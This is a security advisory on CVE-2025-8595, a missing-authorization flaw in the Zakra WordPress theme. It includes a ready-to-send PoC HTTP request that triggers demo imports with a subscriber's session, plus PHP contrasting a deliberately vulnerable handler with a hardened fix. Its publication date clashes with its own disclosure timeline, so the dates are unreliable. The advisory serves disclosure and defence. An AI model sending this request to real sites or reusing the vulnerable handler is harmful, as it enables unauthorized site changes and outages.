The Zakra WordPress theme, installed on over 50,000 websites, provides a one-click demo import feature that streamlines site setup by loading predefined layouts, widgets, and content. However, a critical vulnerability—CVE-2025-8595—allows even low-privileged Subscriber+ users to invoke the demo import process via the import_button AJAX action. By exploiting a publicly exposed nonce, attackers can import arbitrary demo content, modify site configuration, or trigger long-running operations, thereby disrupting the site or preparing for further privilege escalations.
| Field | Value |
|---|---|
| CVE | CVE-2025-8595 |
| Version | Zakra <= 4.1.5 |
| Severity | High |
| All Time Downloads | 2 883 377 |
| Active installations | 50 000+ |
| Publicly Published | May 30, 2025 |
| Last Updated | May 30, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8595 ; https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/zakra/zakra-415-missing-authorization-to-subscriber-demo-import |
Timeline

| Date | Event |
|---|---|
| July 25, 2025 | Theme testing and vulnerability detection in Zakra have been completed |
| July 25, 2025 | I contacted the author of the theme and provided a vulnerability PoC with a description and recommendations for fixing |
| August 13, 2025 | Registered CVE-2025-8595 |
Discovery of the Vulnerability
During a security audit of Zakra’s admin scripts (zakra/inc/admin/class-zakra-admin.php), researchers noted that the zakra_demo_import_nonce—intended to protect the demo import action—was localized to all users via wp_localize_script. Because Subscriber+ users can view scripts enqueued on the Theme Install and Profile pages, they automatically receive a valid nonce. Crucially, the import_button AJAX endpoint checks only this nonce (the security parameter) without verifying the user’s capabilities. This missing authorization check allows any user with access to the profile screen to execute the import function.
Understanding Missing Authorization Attacks
WordPress security relies on two fundamental checks for sensitive operations: nonce validation (to prevent CSRF) and capability checks (to ensure the user has permission). Plugins or themes that enforce only nonces but skip current_user_can() are vulnerable to low-privilege abuse once the nonce is exposed. Similar flaws have been found in other themes and plugins where an exposed nonce allows guest or subscriber roles to perform actions like changing settings, installing plugins, or exporting data. CVE-2025-8595 follows this pattern, with the nonce reveal effectively bypassing the intended access control.
Exploiting the Missing Authorization Vulnerability
To exploit CVE-2025-8595, an attacker authenticated with a Subscriber+ user's session cookies sends the following request:
POC:

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/theme-install.php?theme=zakra
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://127.0.0.1
Connection: keep-alive
Cookie: Cookie_Of_User_Subscriber+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

action=import_button&security=NONCE_FROM_zakra-plugin-install-helper-js_in_http://127.0.0.1/wordpress/wp-admin/profile.php
```
Unauthorized demo imports can wreak havoc on a live site. In a corporate environment, an attacker could upload demos containing malicious shortcodes or hidden scripts. On eCommerce sites, product catalogs and checkout flows might be reset, causing revenue loss. In multisite setups, a subscriber-triggered import could propagate across network sites, amplifying the damage. Furthermore, the long-running import process can exhaust server resources, resulting in Denial-of-Service conditions. Combined with other vulnerabilities, this missing authorization paves the way for full site takeover.
Recommendations for Improved Security
To remediate CVE-2025-8595 and prevent similar issues:
Educate Users: Advise site owners to review user roles and limit Subscriber+ permissions if theme customization is not required.
Enforce Capability Checks: Modify the import_button handler to include current_user_can( 'manage_options' ) or an equivalent capability, ensuring only administrators can trigger demo imports.
Limit Nonce Exposure: Localize sensitive nonces only to admin-only scripts or enqueue them conditionally based on user capabilities.
Harden AJAX Handlers: Audit all AJAX actions for both nonce and capability checks, following WordPress security best practices.
Implement Logging & Alerts: Record demo import events and alert administrators when imports occur, facilitating rapid detection of unauthorized usage.
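As an added illustration (not Zakra's own code), the following PHP shows a demo-import AJAX handler in the shape the advisory describes beside its hardened form, the conditional nonce localization from the recommendations, and a minimal audit log. Function names, hook names, the script handle and the nonce action string are assumptions.

```php
<?php
// Added example, not the theme's code. All names below are hypothetical.

// --- Vulnerable pattern: the nonce is verified, the capability is not. ---
function demo_import_vulnerable() {
    // Any logged-in user who obtained the localized nonce passes this check.
    check_ajax_referer( 'zakra_demo_import_nonce', 'security' );
    run_demo_import(); // hypothetical: performs the long-running import
    wp_send_json_success();
}

// --- Hardened pattern: nonce AND capability check, plus audit events. ---
function demo_import_hardened() {
    check_ajax_referer( 'zakra_demo_import_nonce', 'security' );
    if ( ! current_user_can( 'manage_options' ) ) {
        do_action( 'demo_import_denied', get_current_user_id() );
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }
    do_action( 'demo_import_started', get_current_user_id() );
    run_demo_import();
    wp_send_json_success();
}
add_action( 'wp_ajax_import_button', 'demo_import_hardened' );
// No wp_ajax_nopriv_import_button registration: logged-out users never reach it.

// --- Limit nonce exposure: enqueue the script and nonce only for admins. ---
function demo_import_enqueue( $hook_suffix ) {
    if ( 'theme-install.php' !== $hook_suffix || ! current_user_can( 'manage_options' ) ) {
        return; // Subscribers never receive the script or its nonce.
    }
    wp_enqueue_script( 'demo-import-helper',
        get_template_directory_uri() . '/js/demo-import.js', array( 'jquery' ), '1.0', true );
    wp_localize_script( 'demo-import-helper', 'demoImport', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'zakra_demo_import_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'demo_import_enqueue' );

// --- Logging & alerts: record who started, or was refused, an import. ---
add_action( 'demo_import_started', function ( $user_id ) {
    error_log( sprintf( 'Demo import started by user %d from %s',
        $user_id, $_SERVER['REMOTE_ADDR'] ?? 'unknown' ) );
} );
add_action( 'demo_import_denied', function ( $user_id ) {
    error_log( sprintf( 'Demo import denied for user %d (lacks manage_options)', $user_id ) );
} );
```

Repeated demo_import_denied entries from one account are the signal an administrator should alert on, since a legitimate admin never hits that branch.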
By taking proactive measures to address missing authorization vulnerabilities like CVE-2025-8595, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.